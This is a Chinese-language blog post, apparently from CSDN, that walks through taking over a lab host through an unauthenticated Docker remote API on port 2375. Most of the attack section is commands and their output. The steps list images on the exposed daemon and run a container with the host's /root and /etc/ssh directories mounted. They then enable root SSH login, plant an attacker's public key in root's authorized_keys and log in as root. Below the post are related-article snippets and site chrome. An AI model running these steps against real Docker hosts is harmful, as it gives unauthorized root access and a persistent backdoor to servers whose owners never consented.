Docker2375端口未授权getshell

最新推荐文章于 2024-01-19 11:44:17 发布
最新推荐文章于 2024-01-19 11:44:17 发布
阅读量350 收藏
点赞数
分类专栏: getshell 文章标签: docker 容器 运维 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Is_Linmouren/article/details/120887338
版权

Docker2375端口未授权getshell

靶机:192.168.196.133

利用条件:docker2375未授权、有可启动的主机镜像

1、判断是否可以利用漏洞

扫描端口发现开放端口22和2375

docker -H tcp://192.168.196.133:2375 ps

可以成功执行docker命令

[root@localhost ~]# docker -H 192.168.196.133:2375  images
REPOSITORY                                   TAG                 IMAGE ID            CREATED             SIZE
ubuntu                                       latest              ba6acccedd29        4 days ago          72.8MB

我们把这个ubuntu镜像启动起来,基本上镜像都可以能进去写文件就行,把几个关键目录做数据卷 ,

补充下数据卷

数据卷

是什么

一句话:有点类似我们Redis里面的rdb和aof文件

能干嘛

容器的持久化

容器间继承+共享数据

特点:

1:数据卷可在容器之间共享或重用数据

2:卷中的更改可以直接生效

3:数据卷中的更改不会包含在镜像的更新中

4:数据卷的生命周期一直持续到没有容器使用它为止

使用

直接命令添加

​ 命令: docker run -it -v /宿主机绝对路径目录:/容器内目录 镜像名

也可以用其他写法添加这里就不多赘述

2、利用

docker -H 192.168.196.133:2375  run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

把我们root目录映射到容器里面的/tmp/root 这个目录是关键,docker运行的权限一般比较高所以都会有这个权限

打完这个命令我就进入到ubuntu这个容器里面了ps看一下

[root@localhost ~]# docker -H 192.168.196.133:2375 ps
CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS                    NAMES
e5492f68345d        ubuntu              "bash"                   About a minute ago   Up About a minute                            sad_payne

注意这里是我攻击的机器新开了个shell看的不是在刚刚的打的容器里面

在容器里面查看一下靶机的root是否是可以登录的

我们正常查看的是/etc/ssh/sshd_config这个文件,我们刚刚把他的目录映射到了我们的/tmp/ssh_etc下面那么我们查看的就是/tmp/ssh_etc/sshd_config,查看下PermitRootLogin字段。如果是no就改成yes,允许root通过ssh登录

然后在你攻击机器新开的shell里面生成一个pubkey

[root@localhost ~]# ssh-keygen -t rsa -C "l1nr"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:uhJRNmFJwZ7xYC3Qoh8HczUHkO9c4/Km/leGr14Z24Q l1nr
The key's randomart image is:
+---[RSA 2048]----+
|    .=*O+..      |
|    +.# .o       |
|   . X O         |
|  . o + o o    . |
|   . + oSo . .E .|
|    o  .+ . . o* |
|     ..  o   ++ .|
|    .  .  o ...  |
|     ...o+.oo.   |
+----[SHA256]-----+

这样我们就可以在当前目录下查看到生成了两个文件

一个id_rsa一个id_rsa.pub

然后回到容器里面把我们id_rsa.pub的内容写入到/tmp/root/.shh/authorized_keys这个文件里面(这个文件就等于被攻击机器上的/root/.shh/authorized_keys),如果没有这个目录那就直接新建就好id_rsa.pub里面的内容cat就可以读出来

完成这一步之后就可以在我们攻击机器上利用我们的id_rsa这个文件就可以直接连上我们的靶机

ssh -i id_rsa root@192.168.196.133

连接的时候记得手动输入yes不然直接回车连不上

L1nr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker远程访问get(root)shell姿势
07-21 145
0x00 概述 在用swarm来管理dockers容器集群时默认开启了2375端口,通过远程访问docker run -H tcp://ip:2375 $command 可任意执行docker命令。这个漏洞在一段时间的影响还是挺严重的。通过这个远程访问接口,我么可以获得容器访问权限(get container shell),要想获得宿主机shell,可以在启动容器时通过挂载根目录到容器...
Docker授权访问漏洞
周星星的博客
09-01 1828
docker授权访问漏洞复现,漏洞利用,修复方法
Docker API 授权访问 getshell——漏洞复现
W小哥
10-22 4819
一、Docker介绍 Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker。 二、Docker API 授权访问介绍 Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6 因为权限控制等问题导致可以通过 docker client 或
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Sherry
11-13 4784
配置开启Docker2375远程连接与解决Docker授权访问漏洞。
Docker远程API授权访问导致的Docker逃逸
feng的博客
01-09 1255
Docker远程API授权访问导致的Docker逃逸 前言 是给社团学弟学妹们一次讲课的一次md。 服务器 https://cloud.tencent.com/act/campus 当然想要复现学习这个的话,本地也足够了,可以在linux虚拟机中装docker来复现即可。 Docker Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。 Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也
b2dproxy:使用 boot2docker 时在本地主机上启用公共 docker 端口
06-14
b2dproxy 一个简单的代理,它监视 boot2docker 虚拟机中的 Docker 主机,并在 localhost 为每个开放的公共端口创建一个代理。为什么? 使用boot2docker时很不方便,您不能引用localhost,而是必须使用boot2docker VM...
docker-postfix:用于Postfix的Docker映像打包
03-13
用于Postfix的Docker映像打包 此图像包含Postfix邮件传输代理的安装。 了解有关Postfix的更多信息: : 支持的标签和相应的Packer模板链接 概述 这个Docker容器使启动和运行postfix实例变得容易。 基于,但有一些...
docker-alminium:dockerized ALMinium
04-21
由于使用了docker-compose,因此可以通过更改docker-compose.yml的主机名,端口号和环境变量进行自定义。要启动它,只需点击“ docker-compose up -d”。 参考: ALMinium: : ,这是从派生的Dockerized ALMinium:...
dockerpot:基于 docker 的蜜罐
06-08
$ sudo apt-get install docker.io socat xinetd auditd $ # for installing nsenter $ docker run --rm -v /usr/local/bin:/target jpetazzo/nsenter 安装蜜罐脚本 将honeypot复制到/usr/bin/honeypot并将honeypot....
Docker安装nginx和修改配置方法.docx
04-09
这将启动一个新的容器,并将容器的 80 端口映射到主机的 8080 端口上。这样,我们就可以通过浏览器访问容器中的 nginx 服务器。 查看容器状态 要查看容器的状态,我们可以使用以下命令: `docker ps` 这将显示...
14-授权漏洞利用
weixin_57448301的博客
04-05 355
Redis授权访问漏洞、Docker授权访问漏洞
2375端口docker授权访问
panyu_123的博客
09-28 332
查了相关资料,输入IP:2375/version,返回了docker信息,这就证明了授权漏洞的存在。为进一步证明漏洞,执行命令docker -H tcp://IP:2375 ps,返回部署服务的信息。2375端口被扫描出来时,扫出来的服务是docker服务。这时直接访问IP:2375,提示page not found。按道理该端口是通的,只是url不对。PS:这个漏洞一般的扫描软件是可以直接扫描出来的,很早的漏洞了。在此记录一下自己又一次的知识积累,hhhh。
Docker Remote API 逃逸攻击(2375端口
weixin_31610083的博客
01-19 698
本文分析了如何通过 Docker 2375远程管理API来完成逃逸,但该漏洞需要管理员主动配置,没有广泛存在,但利用难度很低。
Docker授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3232
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
关于docker remote api授权访问漏洞的学习与研究
07-16 615
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
(2375端口)docker swarm端口开放导致授权的访问到获取系统shell的过程
weixin_50464560的博客
12-25 978
本文记录了从一次授权的访问到获取系统shell的渗透测试过程,文中主要阐述了攻击方法、漏洞成因以及防御思路。在进行攻防过程阶段,最重要的工作莫过于信息收集,本文不想记录对信息收集中的数据反复甄别的过程,而是想对一次重大的发现进行过程记录,通过对收集的数据进行反复的筛选发现了2375端口,相信很多在做云原生或者做容器化部署的朋友,应该对这个端口不陌生,没错这个就是docker swarm。从官方的文档可以看出swarm是用来管理docker集群的,本次获取shell权限的过程就与此有着莫大的关系。 起因 有
Docker暴露2375端口,引起安全漏洞
热门推荐
xinxinyunli的博客
05-30 2万+
Docker暴露2375端口,引起安全漏洞
后台getshell常用技巧
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
docker端口转发:
最新发布
01-30
Docker提供了多种方式来进行端口转发,其中两个常用的工具是Shipspotter和docker_iptables。 1. Shipspotter是一个用于访问Docker容器内服务的远程端口转发工具。它可以用于访问那些私有管理界面、JMX端口或Erlang/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值